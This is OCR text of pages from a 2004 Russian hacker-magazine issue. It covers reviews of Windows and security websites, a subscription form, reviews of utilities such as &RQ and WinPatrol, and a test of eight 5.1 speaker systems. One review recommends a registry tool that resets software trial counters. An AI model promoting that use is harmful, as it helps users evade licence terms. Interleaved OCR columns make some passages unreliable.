статьи. В раздел "Уведом- 
ления" производители прог- 
раммного обеспечения пуб- 
ликуют свои бюллетени по 
безопасности. На сайте по- 
мещают последние экспло- 
иты (конечно, для ознако- 
мительных целей) и инфор- 
мацию о полезных утилит- 
ках (более 5000), которые 
тебе пригодятся в повсед- 
невной работе. А форум - 
один из наиболее популяр- 
ных в России по информа- 
ционной безопасности. Вли- 
вайся! 


WWW.WINCITY.RU 


Небольшой ресурс, 

на котором собраны 
различные материалы по 
Windows: реестр, оптимиза- 
ция, настройка, безопас- 
ность, локальные сети, же- 
лезо, ПО и компьютерное 
право. Есть подборка полез- 
ных утилиток и программ 
под Винды, патчи и русифи- 
каторы. Полезными окажут- 
ся советы и решения часто 
возникающих проблем. 


WWW.SYSINTERNALS.COM 


Проект Марка Русси- 

новича и Брюса Когс- 
велла. Не знаешь, кто такой 
Марк Руссинович? Позор и 
стыд. Это один из известных 
программистов, который 
возглавляет контору, зани- 
мающуюся разработкой 
системных приложений для 
Виндов. Он написал множе- 
ство мануалов и статей, пос- 
вященных различным вер- 
сиям Windows, a также кучу 


полезных приложений, к 
примеру, тот же TCPView. 
На сайте можно скачать 
CPUMon, DebugView, 
Diskmon, Filemon, Handle, 
ListDLLs, NTFSInfo, PMon, 
Portmon, Process Explorer, 
PsTools, Regmon, TDImon, 
Tokenmon, Winobj, CacheSet, 
Contig, Frob, PageDefrag, 
AccessEnum, Autoruns, 
Ваш, Ctri2cap, Diskview, 
FAT32 for Windows NT 4.0, 
Fundelete, LDMDump, 
LiveKd, NewSID, NTRecover, 
NTFSCHK, NTFSDOS, NTFS- 
DOS Professional, NTFSFip, 
PsTools, Remote Recover, 
SDelete, ShareEnum, Sync, 
VolumelD, Bluescreen и T.g. 


WWW.WINNTMAG.COM 


Электронный магазин 

Windows IT Pro - масса 
практической и технической 
информации для !Т-специа- 
листов, работающих с Вин- 
дами и SQL-cepBepom. Пос- 
ледние разработки и техно- 
логии, настройка, управле- 
ние и решение возникаю- 
щих проблем. Среди горя- 
чих тем - технология Active 
Directory, защищенность 
почты, программы Exchange 
и Outlook, миграция, мобиль- 
ность и использование 
беспроводных технологий, 
сети, скрипты, безопасность, 
веб-администрирование, ре- 
зервирование данных и T.g. 
Обновление несколько раз 
в сутки! На сайте есть сле- 
дующие форумы: общие 
вопросы по Виндам, пробле- 
мы различных версий ОС 
Windows, сервера на базе 
Windows, разработчикам, 
SQL-cepBep и сертифика- 
ция. Есть отдельный раздел, 
освещающий семинары, 
конференции и выставки по 
всему миру, посвященные 
OC Windows. Реально nopa- 
довал FAQ 
(www.windowsitpro.com/FAQ) с те- 
матической разбивкой - 
удобно перемещаться и ис- 
кать информацию. Ответы 
на вопросы исчерпывающие 
и с пошаговыми инструкция- 
ми, при необходимости при- 
водятся ссылки на дополни- 
тельную информацию с дру- 
гих ресурсов. На сайте пре- 
дусмотрено платное член- 


ство - получаешь доступ к 
рассылке материалов, кото- 
рых на сайте нет (статьи, но- 
вости, мануалы, практичес- 
кие советы и другая полез- 
ная информация). 


WWW.VIRUSLIST.COM 


Если у тебя поселился 

вирус, самое время по- 
лечиться :). Пробуешь анти- 
вирус (предварительно ска- 
чав последнее обновление 
антивирусной базы) и прого- 
няешь программку на отлов 
шпионов (adware и spyware). 
Не помогло? Не все потеря- 
но - обратись на 
www.virusiist.com. Тебе в раздел 
"Последние вирусы". Там 
описаны симптомы подопеч- 
ных и пошаговое устранение 
заразы. Инструкции по лече- 
нию может и не быть, но по 
симптомам ты хотя бы опре- 
делишь, как вирус называ- 
ется, чтобы найти в инете 
противодействие ему. Поми- 
мо описания вирусов и троя- 
нов на сайте есть любопыт- 
ные материалы по около- 
компьютерной жизни, све- 
жие новости и статьи. 


Полезный ресурс, 

правда, англоязычный, 
посвященный безопасности 
Windows (что, в принципе, 
понятно уже из адреса). Тво- 
его внимания стоят разделы: 
статьи и мануалы (Articles & 
Tutorials), фак по безопас- 
ности (Security FAQs, вклю- 
чает два фака: по обнаруже- 
нию атак и по троянам), об- 
зор софта (Software, тут мно- 
го всего: антивирусы, смарт- 
карты, защита от спама, 
шифрование почты, анали- 
заторы логов, даерволы, де- 
текторы атак, сетевые ути- 
литки, сканеры, защита кон- 
тента в вебе и многое другое) 
и онлайновый сканер троя- 
нов на твоем компьютере 
(TrojanScan) - и ведь скани- 


рует, зараза :). 
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Извещение ИНН 7729410015 ООО «Гейм Лэнд» 


ЗАО — Международный Московский Банк, г. Москва 

р/с № 40702810700010298407 

к/с № 30101810300000000545 

БИК 044525545 КПП - 772901001 


на комплект Хакер, Хакер Спец, Железо 
[Г] Хакер комплектуется 2CD* 


Г] Хакер комплектуется DVD* 
*отметьте необходимую комплектацию 


Плательщик 


на 12 месяцев 
ы Адрес (с индексом) 
начиная с 2005 г. 


Назначение платежа Х$ сумма 

Оплата за « СПЕЦПРЕДЛОЖЕНИЕ », 2925 рублей 
с 2005 г. 
Ф.И.О. “ 
Подпись плательщика 


Доставлять журнал по почте 
на домашний адрес 


м Доставлять журнал курьером на 
адрес офиса (только по г. Москве) 


: 2 * 
Подробнее о курьерской доставке читайте ниже 


(отметьте квадрат выбранного варианта доставки) 


Ф.И.О. 


ИНН 7729410015 ООО «Гейм Лэнд» 


Квитанция 
ЗАО — Международный Московский Банк, г. Москва 
дата рожд. LIL. LILI. LIL Г. р/с № 40702810700010298407 
АДРЕС ДОСТАВКИ: к/с № 30101810300000000545 
индекс БИК 044525545 КПП - 772901001 
областыкрай Плательщик 
город Адрес (с индексом) 
улица 
дом корпус Назначение платежа XS Сумма 
квартира/офис Оплата за « СПЕЦПРЕДЛОЖЕНИЕ » 2925 рублей 
телефон ( ) с = 2005 r. 
: г Ф.И.О. 

e-mail 

Kaccup Подпись плательщика 


Е ИЕР РЕ ЕЕ Е Е Е 


сумма оплаты 2925 рублей 


1. Заполнить купон и квитанцию 

2. Перечислить стоимость подписки через Сбербанк 

3. Обязательно прислать в редакцию копию оплаченной 

квитанции с четко заполненным купоном любым из 

перечисленных способов: 

® по электронной почте: subscribe xs@gameland.ru; 

e по факсу: (095) 924-9694; 

e по адресу: 107031, Москва, Дмитровский переулок, д. 4, строение 2, 
000 «Гейм Лэнд», Отдел подписки. 


По всем вопросам по подписке можно звонить по бесплатному телефону 8-800-200-3-999. 
* Курьерская доставка осуществляется в течении Зх дней после выхода журнала в 


продажу только по Москве на адрес офиса, для оформления доставки курьером 
укажите адрес и название фирмы в подписном купоне. 
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СОФТ. 
ОТ МОМАМ 


а этот раз твоему вниманию предлагаются свежевыстиранные шаровары и девственно чистые фривары: одна по- 
ловина из них связана с Web, другая - непосредственно с темой номера. Юзай и наслаждайся! 


FTP SERV-U V5.2.0.0 


Вышла новая версия очень удобной программы 

для превращения твоего компьютера в ЕТР-сер- 
вер. Настроек - предостаточно. Функция удаленного адми- 
нистрирования присутствует в полной мере. 
Подходит для серверов, имеющих как один, так и несколь- 
ко |Р-адресов. Имеются инструменты наследования прав 
доступа. Программа тихонько сидит в системном трее и не 
питюкает. А 
по цвету ее 
иконки лег- 
ко можно 
определить, 
нашелся ли 
желающий 
что-либо 
скачать с 
твоего ново- 
явленного 
] сервера... 


LIGHT ALLOY V2.6 


Бесплатный (для наших) плеер видео- и аудиофрай- 
лов. Поддерживает дикое количество срорматов, име- 
ет множество настроек, прост в управлении и может рабо- 
тать даже на слабых машинах. 
По настройкам есть практически все: изменение скорости, 
пропорции, настройка аудио- и видеодекодера, фильтры, по- 
кадровый просмотр, возможность подключения и регулиро- 


CENTRAL BRAIN IDENTIFIER V7.2.0.9 
BUILD 0909 FINAL 


Эта программа подробно расскажет, что за процес- 

cop от компании AMD установлен в твоей системе. 
Она покажет, когда сделан процессор, на каком ядре, по 
какой технологии, 
какова его реальная 
частота. 
Также будет выдана 
и некоторая инфор- 
мация по материнке: 
частота системной 
шины, размер кэшей 
всех уровней, OPN- 
номер и др. Разуме- 
ется, если у тебя ку- 
сочек кремния рож- 
ден в стенах Intel 
или VIA, утилита бу- 
дет молчать, словно 
гнилой помидор! 


вания звуковых дорожек, метки, субтитры... Плеер поддержи- 
вает drag&drop и основные плагины от WinAmp. Вдобавок 
можно сменить скины. Практически на все действия вешают- 
ся хоткеи или управление непосредственно мышкой (гиперу- 
добно!). Может скатываться в трей. Есть русский ит.д. 

В новой версии Light Alloy добавлены: возможность пози- 
ционирования субтитров по вертикали, возможность заг- 
рузки двух субтитров одновременно, поддержка МК\, 
MKA, RA, RV, RM, РАМ. Также убыстрен видеопроцессор 
и исправлены баги. 
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дистрибутива, причем в последнем случае BCA инсталля- 
ция сводится к банальной распаковке ‹файлов из архива и 
созданию ярлыков там, где их обычно создают. Никаких 
записей в реестр &RQ не производит! Контакт-лист и исто- 
рия общения хранятся локально, то есть не отсылаются 
на сервер и не принимают с него эти данные. 

Здесь есть как плюсы, так и минусы. Положительный мо- 
мент заключается в том, что если с твоим номером аськи 
что-то случилось, то вместе с номером твой контакт-лист мо- 
жет попасть к постороннему человеку, которому совершен- 
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WINPATROL V8.0 &RO 0.9.4.17 
—— = Е < 
Пакет программ (все в одном) для защиты твоей [>> "ICQ must die, &RQ forever" - приблизительно такая 
системы от всевозможных напастей. Программа заг- мысль первой посетила меня при сравнении этих > 
ружается вместе с Виндой и отслеживает (использует эв- двух программ. &RQ - очень компактный !СО-клиент, со- 
ристический подход) записи в реестр, область автозагруз- держащий практически все (а лично для меня абсолютно = 
ки, системные папки. все) необходимые срункции. При этом ничего лишнего в 
При этом можно контролировать все происходящие про- него встраивать не стали. Программа совершенно бесп- о 
цессы, запущенные задачи и сервисы (получение полного латна (то есть по-настоящему бесплатна: никаких банне- 
отчета). Также при помощи WinPatrol всегда можно прос- ров тоже не крутят!). &RQ не требует инсталляции. Bep- a 
мотреть и отредактировать кукисы, увидеть, что стоит в нее, инсталляция необязательна - в природе &RQ встре- 
автозагрузке, и убрать лишнее. чается как в виде ZIP- или КАК-архивов, так и в виде 8 
6 
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Ба таит но не обязательно знать, с кем ты общаешься. Второй 
a = aah плюс: утром, собираясь Ha работу, ты шустренько архивиру- 
Pewnate орт ков пища gem ешь &RQ, пишешь его на дискетку (влезает!) и берешь с 

"а "ша ава а _ собой Ha работу. Саму папку с &RQ, разумеется, стираешь с 
Е. <= =. —__ | — = лица харда. И оставшиеся дома муж/жена/дети уже никоим 
образом не получают доступ ни к твоим контактам, ни к ис- 
тории общения - консриденциальность полнейшая, работа- 
ет принцип "все свое ношу с собой" :) Кстати, программа 
поддерживает импорт/экспорт контактов в дормат CLB. 
REGISTRY TRASH KEYS FINDER Есть еще одна приятная особенность контакт-листа (KOTO- 
рая в других !СО-клиентах встречается довольно редко): 

Отличная программа для удаления из реестра вся- все осрерлайн-контакты наравне с онлайн отсортированы по 

кого рода мусора, например, записей-счетчиков ос- группам. Когда в контакт-листе "сидят" человек 40-50, это 

тавшихся дней, оставляемых очень многими несвободны- может и не показаться удачной мыслью, но когда список 
ми программами. контактов насчитывает не одну сотню человек, на этот па- 
Главным эффектом удаления этих ключей из реестра AB- раметр волей-неволей приходится обращать внимание. Сам 
ляется "оживление" некоторых Тпа[версий программ, ко- процесс общения сделан максимально удобным. Если идет 


"сеанс одновременной иг- 
ры", то есть общаешься па- 
раллельно с несколькими 
людьми, то нет энного чис- 
ла открытых окон, оно все- 
го одно! В нем - закладки, 
по одной на каждого собе- 
седника. Переключение 
между ними осуществляет- 
ся мышастым щелчком по 
нужной закладке. При об- 
щении проблем с кодиров- 
кой кириллицы практичес- 
ки не наблюдается. Идеала 
достичь пока не удалось, 
но в этом плане не идеален 
даже родной [СО-клиент, а 
если сравнивать с 
Trillian'om, то здесь все куда 
лучше. &RQ поддерживает 


торые уже сообщили тебе о том, что срок их опробования 
истек, или просто обнуление счетчика дней тестирования. 
Можно настроить программу так, чтобы она производила 
чистку, например, при загрузке Windows. 


WINPLOSION V2.17 


Классная прога, эмулирующая способность MacOS 
показывать уменьшенные версии окон на десктопе 


изменение внешности 

для выбора активного приложения. Своего рода замена "шкурным" методом, а так- 
Alt-Tab. Если у тебя же расширение своей 
(как иу меня :)) мно- функциональности благо- 
го открытых окон - даря возможности приме- 
качай WinPLOSION! 


нения плагинов. 
На диске лежит дистрибу- 
тив &RQ, содержащий в 
себе инсталлятор, нес- 
колько тем. После инстал- 
ляции папку Plugins можно 
смело прибить - &RQ рез- 
ко похудеет вдвое. 


Выглядит просто 
потрясающе! Mog- 
держивает горячие 
клавиши или дви- 
жения мышью - на- 
жал и сразу увидел 
уменьшенные версии всех открытых приложений. Далее 
осталось только выбрать нужное. 


Звук вокруг 
Mustek PL408 


Паяльник 
Сплошные баги 


HARD | ЗВУК ВОКРУГ )) 


Алексей Малашин, test_lab (test_lab@gameland.ru) 


ЗВУК | 
ВОКРУГ 


АУДИОСИСТЕМЫ 


ТЕСТИРУЕМ 5.1-КАНАЛЬНЫЕ 


4 


В сфере недорогих акустичес- 
ких систем наблюдается появ- 
ление новых, весьма непло- 
хих моделей, но это не повод 
сбрасывать со счетов и "ста- 
ричков", которые уже доста- 
точно долгое время занимают прочные пози- 
ции на вершине. Сегодня мы решили выб- 
рать наиболее простую и, вместе с тем, CDYHK- 
циональную акустику для дома, которая смо- 
жет стать центром звуковоспроизведения и 
заменить собой все использующиеся ранее 
системы. Итак, в нашем тесте присутствует 
восемь 5.1-канальных систем. 


ТЕХНОЛОГИИ 

Много раз говорилось, из чего состоят 
колонки, как происходит усиление звука и 
как правильно подключать системы, однако 
вопрос правильной расстановки сателлитов 
до этого времени как-то упускался из виду. 
Поэтому мы решили восполнить этот пробел, 
рассказав, как можно наиболее корректно 
расставить все компоненты акустики, чтобы 
звуковое оформление оказалось полным и 
качественным. 
Выбираем место. Нужно учитывать, что слу- 
шатель должен находиться как бы в центре 
окружности (поскольку это наиболее прос- 
той способ, не требующий никаких расчетов, 
а далее мы расскажем, как ее построить), по- 
этому как сзади, так и спереди должно быть 
достаточно места для расположения сател- 
литов. Также стоит учитывать, что сабвуфер 
должен стоять на жесткой поверхности (то 
есть постановка его на ковер не подойдет) и 
находиться в пределах слышимости/види- 
мости (то есть в той же комнате), причем мес- 
тоположение НЧ-динамика лучше всего оп- 
ределять экспериментальным путем. 
Устанавливаем колонки. Для того чтобы 
звук наиболее четко позиционировался 
(например, чтобы машины в фильмах проно- 
сились спереди назад и это чувствовалось 
ухом), оптимальнее всего будет выбрать мес- 
то для прослушивания в центре комнаты, и 


ТЕСТОВЫЙ СТЕНД: 


Материнская плата: ASUS A7V8X-X (BIOS ver 1012) 
Процессор: AMD Athlon(tm) XP 1800+ 1.53GHz 
Память: Hyundai 256Mb DDR PC2700 

Звуковая плата: SoundMax Digital Audio 


OC: Windows XP Professional EN Corp Edition (build 
2600.xpsp_sp2_rtm.040803-2158: SP2) 
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СПИСОК УСТРОЙСТВ 


Creative Inspire 
P5800 


Genius SW-5.1 Home 
Theater Deluxe 


A4Tech S-570 


A4Tech S-550 


Defender SPK-HT5.1 


Defender Hollywood 
| | SPK-D5.1 


Logitech 75300 


| a Jazz J9931 


test_lab выражает благодарность за предоставленное Ha 
тестирование оборудование компаниям «АЛИОН»» (т.: 727- 
1818), «БЮРОКРАТ» (т.: 745-5511), «ТОР» (www.tor- 
trade.ru), «East Side Consulting GmbH» (www.east-side-con- 
sulting.com). 


далее мы будем отталкиваться именно от этого положения. 
Теперь нас интересует построение окружности, на которой 
будут располагаться колонки-спутники. А делается это 
просто - от центра можно протянуть веревочку или нитку, 
которой впоследствии будет отмеряться расстояние. Соот- 
ветственно центральный сателлит устанавливается по 
центру (например, на телевизор), а остальные (передние) 
должны располагаться на одинаковых расстояниях от 
центрального, причем с таким же расстоянием до слушате- 
ля (для этого-то как раз и нужна окружность). Высота рас- 
положения всех передних колонок должна быть одинако- 
вой (на уровне головы). Задние же колонки подвешивают- 
ся на стену или ставятся на постаменты, поскольку их рас- 
стояние go пола должно быть значительно больше, чем у 
передних (определяется по линии в 30-40 градусов от го- 
ризонтальной плоскости, построенной на уровне головы), 
причем они также должны находиться на окружности. Са- 
мым сложным является определение положения сабвусре- 
ра, для чего потребуется как минимум два человека - один 
будет переставлять НЧ-колонку, а другой - определять ка- 
чество звука. При перемещении по комнате следует найти 
место, откуда бас слышится наиболее четко, глубоко и соч- 
но - именно там и стоит оставить саб. 

Стоит помнить о том, что у некоторых систем имеется огра- 
ничение по длине проводов (если они встроены) или уп- 
равлению (когда пульт подключен к проводу). Общая же 
схема расстановки представлена на рисунке, и для лучше- 
го звучания стоит располагать элементы акустической 
системы максимально приближенно к ней. 


МЕТОДИКА ТЕТИРОВАНИЯ 

Для тестирования и оценки акустических систем мы: 
@. Прослушивали музыкальные композиции с компью- 
тера, MP3-nneepa (как современного, так и старого сти- 
ля, в разных режимах работы системы) 
@. Пробовали озвучивание эфсректов в играх (Unreal 
Tournament 2004) 
@. Выясняли удобство подключения компонентов систе- 
мы между собой и соединение ее со звукоизлучающим 
устройством 
@. Оценивали срункциональность и дизайн системы » 
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=== JetBalance JB-381 


JetBalance JB-631 


[-——— ВНИМАНИЕ! 
В канун Нового года 
ea каждый рискует не 
остаться без подарка 
oT JetBalance: 
3 фирменных рюкзака 
“ и 10 стильных кейсов 
для СО - поощрительные 
призы ждуттебя! 
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УСЛОВИЯ 


Свои творения в форматах MP3 и ААС присылай нам по e-mail 
на konkurs@real.xakep.ru с темой «JB: Новогодний трэк». 
Работы принимаются до 31.12.2004. Результаты будут 
опубликованы в мартовском номере Хакер Спец за 2005 год, 

а работы победителей будут выложены на наш CD. 

Призы победителям будут вручены в редакции журнала! 


7 HARD звук ВОКРУГ ) 


АДТЕСН $-570 и 


Реальная мощность: 50 ВТ (саб), 20 Вт (передние), 20 Вт (задние) 


Частотный диапазон: 35-20000 Гц 
Материал: дерево (сателлиты), дерево (сабвуфер) 
Управление: пульт ДУ + передняя панель сабвуфера 


Размеры: 210x395x300 мм (ca6Byqpep), 150x230x160 мм (сателлиты), 
350x135x160 (центральный) 


Достаточно большая по сризическим размерам, система является 

одной из лучших в тесте - полностью деревянные сателлиты и 
caOByqpep издают прекрасный звук практически на любой громкости. 
Темно-коричневый цвет (под дерево) прекрасно сочетается как со стро- 
гой, так и с "домашней" обстановкой в комнате, а серебристая передняя 
панель сабвуфера (и осрормление твиттеров у сателлитов) придает некий стиль всей системе в целом. В дополнение к акустике при- 
лагается пульт дистанционного управления, который практически полноффункционален (отсутствует лишь возможность переключать 
звуковые входы задней панели сабвусрера, остальное же управление полностью повторяет элементы на НЧ-динамике). 
Звучание A4Tech S-570 приятно во всех отношениях (оно и понятно - двухполосные сателлиты с динамиками, "заточенными" под 
определенный диапазон частот справляются с задачей лучше, чем "всечастотники"). При прослушивании музыки в некоторых 
композициях обнаружились "запирания" сабвуфера, однако выявить зависимость не удалось, поскольку такой эврорект наблю- 
дался там, где по идее все должно быть гладко (а, скорее всего, просто сказывается качество композиции). 
Соединение всех компонентов акустики произошло без видимых трудностей, правда маркировка на проводах отсутствует и само 
деление сателлитов тоже (все они одинаковые). Провода, закрепляющиеся при помощи пружинных зажимов, имеют достаточный 
запас длины (10 метров gna задних и 2 метра для передних сателлитов), поэтому проблемы с дополнительным их приобретением 
возникнуть не должно. Маленькой неудобностью является синяя световая индикация подсветки режимов работы, поскольку да- 
же при непрямой видимости внимание переключается на колонки. 


A4TECH $-550 


Реальная мощность: 35 BT (саб), 2x18 Вт (передние), 2x18 Вт (задние), 20 Вт (центр) 
Частотный диапазон: 35-20000 Гц 

Материал: дерево (сателлиты), дерево (сабвуфер) 

Управление: передняя панель сабвуфера. 


Размеры: 210x395x300 мм (ca6Byqpep), 350x135x130 мм (центральный), 
130х130х230 мм (сетеллиты) 
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Практически полный аналог предыдущей системы, но име- 
ющий немного меньшие размеры (вследствие чего и мень- 
шую мощность звука) и не имещий пульт дистанционного управ- 
ления. Звучит, однако, A4Tech S-550 вполне неплохо, причем ка- 
чество звука сравнимо со старшей моделью, единственной небольшой проблемой, которая возникает на композициях 
типа "Benny Benassi - Satisfaction" является "запирание" сабвуфера на большой громкости. В остальном же никаких 
претензий к воспроизводимой музыке, а также фильмам и играм нет. 
Более удобной является система управления (построенная на использовании резисторов) по сравнению с A4Tech 
S-570, поскольку у нее отсутствует позиционирование регуляторов (то есть не отображается уровень сигнала, уп- 
равление происходит при помощи кнопок). 
Подключение системы происходит просто без раздумий над тем, в какую дырочку что должно быть подсоединено, а пру- 
жинные зажимы для проводов способствуют надежному из закреплению. 
В общем, хорошая акустика, которая подойдет как для прослушивания музыки, так и для комфортного просмотра фильмов, да 
и поиграть под звуки, раздающиеся из колонок этой системы, будет одно удовольствие. 


DEFENDER $РК-НТ5.1 
kkk 


Реальная мощность: 20 Br (саб), 8 Вт (передние), 8 Вт (задние 
Частотный диапазон: 35-20000 Гц 

Материал: пластик (сателлиты), дерево (сабвуфер) 
Управление: передняя панель сабвуфера 

Размеры: 270х170х235мм (сабвуфер), 107х87х87мм (сателлиты) 


Пять одинаковых сателлитов и деревянный сабвусрер - ни- 
каких выделяющихся особенностей у данной системы нет, 
кроме миниатюрных размеров. Присоединение колонок-спутни- ™ 
ков к сабвуферу происходит посредством тюльпана (другой же 
конец провода "впаян" в корпус сателлита), длина соединитель- 
ных кабелей является достаточной для установки системы около компьютерного стола, элементом же домашнего кино- 
театра акустике с таким способом крепления стать не суждено. 
Несколько слов касательно звучания динамиков - при включении сразу чувствуется несбалансированность громкости сателли- 
тов и сабвуфера (при одинаковом положении ручек регулировки), но проблема решается подстройкой баса на нужный уровень 
громкости. Если говорить о правильности воспроизведения низких частот, то здесь акустика оказалась весьма неплохой (если 
сравнивать с системами похожего класса). Неприятностью является невосприимчивость современной музыки (жесткие стили), 
когда начинается хрипение как сателлитов, так и басовой колонки. 


ХАКЕРСПЕЦ | 11(48) | 2004 


DEFENDER HOLLYWOOD SPK-D5 


Реальная мощность: 50 ВТ (саб), 20 Вт (передние), 20 Вт (задние) 
Частотный диапазон: 35-20000 Гц =— т, 
Материал: дерево (сателлиты), дерево (сабвуфер) г. 

Управление: пульт ДУ + панель на сабвуфере 


Размеры: 195x310x350 мм (сабвуфер), 350x135x160 мм (центральный), 
150x230x160 мм (сателлиты) 


Довольно приятная система серебристого цвета, неплохо 
смотрящаяся в сборе, причем съемные сетки сателлитов 
открывают под собой также стильный вид - чтобы разнообразить обстановку, можно их либо надевать, либо снимать, а 
также комбинировать эти два вида. Регулировка работы системы весьма удобна - пульт дистанционного управления поз- 
воляет в полном объеме изменять все характеристики акустики, присутствует возможность управления и с передней па- 
нели сабвуфера, короче, имеется полный набор возможностей по управлению звуком. 
Неплохие возможности также и по подключению различных звуковоспроизводящих устройств - можно одновременно задей- 
ствовать несколько видов входов: DVD, компьютер и универсальный AUX. Поддерживается кодирование звука в формате AC- 
Зи DTS, ну и, естественно, присутствует возможность воспроизведение обычного стерео. Интересной является функция мик- 
ширования двухканального источника на все пять колонок для создания объемного звучания. 
Звучание всей системы достойно ушей меломана, поскольку все частоты (указанные в документации) воспроизводятся систе- 
мой одинаково хорошо и проблем вроде "хрипотцы" или "запираний" не обнаруживается. Так что акустика является прекрас- 
ным дополнением к домашнему кинотеатру, аудиоцентру или игровой консоли. 
Неудобство y этой системы одно - ярко-синий индикатор подсветки настолько сильно бьет по глазам, что на время тестирова- 
ния его даже пришлось заклеить непрозрачной изолентой. 
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JAZZ 39931 
К ЕЕ ЕЕ? 


Реальная мощность: 50 ВТ (саб), 2x10 Вт (передние), 2x10 Вт (задние) 
Частотный диапазон: 40-20000 Гц 

Материал: дерево (сателлиты), пластик (сабвуфер) 

Управление: пульт ДУ + панель на усилителе 


Размеры: 280x420x350 мм (сабвуфер), 330х95х200 мм (центральная- 
усилитель), 225x140x105 мм (сателлиты). 


Слегка запутанное подключение системы, так что поначалу 
приходится потратить некоторое время, чтобы разобраться с 
тем, как же все-таки правильно соединить между собой все компо- 
ненты системы (хотя на самом деле ничего сложного). Затем оказалось, что для подключения к звуковой карте компьютера тре- 
буются специальные переходники (RCA-MiniJack3.5), которых почему-то в комплекте не было. 
Управление системой происходит посредством пульта или же панели на усилителе (который, кстати, совмещен с цент- 
ральным акустическим каналом). Приятная особенность - наличие цифровой индикации уровней сигнала по каждому от- 
дельному компоненту (передний, задний, центральный, сабвуфер). 
Издаваемые акустикой звуки порадовали своей чистотой и глубиной (что обеспечивается двухкомпонентностью сател- 
литов, которые состоят из широкополосного и ВЧ-динамиков). Правда, на большой громкости оказалось, что появляют- 
ся некоторые дребезжания (высоких частот), но точно выявить их происхождение (то ли сама система, то ли что-то в ком- 
нате) не удалось, поэтому, вероятно, акустика здесь не при чем. 
Впечатление от системы весьма приятное, но для домашнего кинотеатра мы бы использовали какое-либо другое устройство, 
поскольку длина проводов может ограничить расстояние расстановки компонентов. 


LOGITECH 25300 
LS eel 


Реальная мощность: 100 ВТ (саб), 2x35 Вт (передние), 2x35 Вт (задние) 
Частотный диапазон: 35-20000 Гц 

Материал: пластик (сателлиты), дерево (сабвуфер) 

Управление: проводной пульт 

Размеры: 30x30x38 (сабвуфер), 10x20x10 (сателлиты), 17х12х10 (передний). 


Эффектная на вид система, обладающая, однако, не самым 

лучшим звучанием (а если качество звука еще сравнивать и с 
ценой, выбор будет не в пользу Logitech 75300). Вытянутая форма 
пластиковых сателлитов является не самым оптимальным решением. 
Интересной является конструкция динамиков, по центру которых 
имеется алюминиевая вставка конусной срормы, которая не имеет особого практического значения. Плюсом же является рези- 
новый подвес gucpcpy3opoB, благодаря которому обеспечивается более плавный и точный ход звукоизлучающей пластины. 
Достаточно интересна конструкция сателлитов, а, вернее, их подставок - поворотный механизм организован таким образом, что 
звук всегда будет направлен на слушателя, в независимости от одного из двух положений колоночки (на стене либо на гори- 
зонтальной подставке). Провода, соединяющие периферийные компоненты с сабвуфером, жестко встроены в корпус с одной 
стороны и имеют разъем типа "тюльпан" с другой, поэтому убрать лишний кабель или добавить дополнительный не получится. 
Съемные сетки являются скорее элементом дизайна, чем несут каку-то оберегающую срункцию, поскольку неплотное их приле- 
гание к корпусу и отсутствие жесткой решетки не обеспечит защиту дифорузора от пыли или случайного удара. Проводной 
пульт ДУ достаточно удобен, однако сам сракт того, что он не дает полной свободы перемещений, печален. 
В целом можно сказать, что система достойна украсить околокомпьютерное пространство, однако для игр и фильмов в форма- 


те DVD (как элемент домашнего кинотеатра) акустика не вполне подходит. 
я » 


(7 НАво | звук ВОКРУГ ) 


CREATIVE INSPIRE P5800 
= SSS SSS Se 


Реальная мощность: 17 Вт (саб), 6 Вт (передние), 6 Вт (задние) 
Частотный диапазон: 40-20000 Гц 

Материал: пластик (сателлиты), ДСП (сабвуфер) 

Управление: пульт на проводе 

Размеры: не указано 


Акустика Inspire P5800 от известного своими звуко- 

выми картами брэнда Creative, как обычно, выделя- 
ется из ряда себе подобных приятным дизайном и непло- 
хим качеством звучания. Подключение данной системы 
не вызывает затруднений, и буквально за несколько ми- 
нут можно получить полноценный "домашний кинотеатр", 
состоящий из пяти сателлитов и одного сабвуфера. 
Что касается качества звучания, то эта акустика выгод- 
но выделяется среди относительно "дешевых" систем, и, хотя сателлиты выполнены из пластика, на средней громкости 
можно послушать музыку и ухо не будет "цепляться" за слышимые искажения. При повышении же громкости проявляют- 
ся некоторые проблемы вроде дребезжаний высоких частот или «запираний» caOBycpepa (что особенно проявляется в иг- 
pax, когда, например, вокруг раздаются многочисленные взрывы). И вообще говоря, Inspire Р58ОО больше подойдет в ка- 
честве красивого дополнения к домашнему компьютеру/плееру/ноутбуку для прослушивания негромкой музыки, посколь- 
ку иногда система входит в некий "ступор". 
Комплектация достаточно стандартная - подставки для сателлитов, наклеечки на провода (чтобы не перепутать их при подклю- 
чении) да внешний адаптер питания (который достаточно большой и тяжелый). Неудобство составляет проводной пульт, кото- 
рый жестко привязан к сабвуферу, так что управление системой ограничено некоторым пространством. 
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GENIUS SW-5.1 HOME THEATER DELUXE 
= SSS 


Реальная мощность: 45 ВТ (саб), 15 Вт (передние), 15 Вт 
(задние) 

Частотный диапазон: 20-20000 Гц 

Материал: дерево 

Управление: пульт ДУ + передняя панель сабвуфера 


Размеры: 220x380x330 мм (саб), 160x235x165 мм (передние), 
120x120x120 мм (задние), 360x160x165 мм (центральный) 


Легендарная, можно сказать, система Genius SW-5.1 

Home Theater Deluxe уже несколько раз побывала в 
нашей тестовой лаборатории и вот снова оказалась среди 
тестируемой акустики. 
Функциональность этой акустики находится на недостижи- 
мом для некоторых уровне - присутствуют все основные воз- 
можности, причем реализация их весьма и весьма удобная. 
Элементы управления, располагающиеся на передней пане- 
ли, обеспечивают возможность полного взаимодействия с каждым звуковым входом, а основные регуляторы позволяют изме- 
нять баланс между сателлитами. Надо отметить также и весьма стильный дизайн (дерево + черные защитные сетки), так что сис- 
тема подойдет практически к любой обстановке. 
Звук, конечно же, весьма и весьма хорош, обеспечивается это благодаря набору динамиков, предназначенных для 
воспроизведения лишь какого-то определенного диапазона частот (передние сателлиты содержат и "пищалку", и 
"среднечастотник"). Вся акустика в целом прекрасно показала себя даже на очень высокой громкости и полном уров- 
не различных частот (то есть по отдельности мы проверяли высокие, средние и низкие). Работать под музыку, разда- 
ющуюся из динамиков Genius SW-5.1 Home Theater Deluxe, одно удовольствие, а во время минуты отдыха создается 
прекрасное звуковое дополнение к играм или фильму. 
Сборка системы не представляет особых сложностей, а в комплекте обнаружились даже скобы для закрепления тыловых сател- 
литов на стене. Наличие же целых пяти типов акустических входов позволяет одновременно подключить всю звуковоспроиз- 
водящую аппаратуру в доме, а впоследствии переключаться между источниками. Единственным небольшим минусом является 
нефункциональный пульт, позволяющий изменять только общую громкость да переводить систему в ждущий режим. 


ВЫВОДЫ 


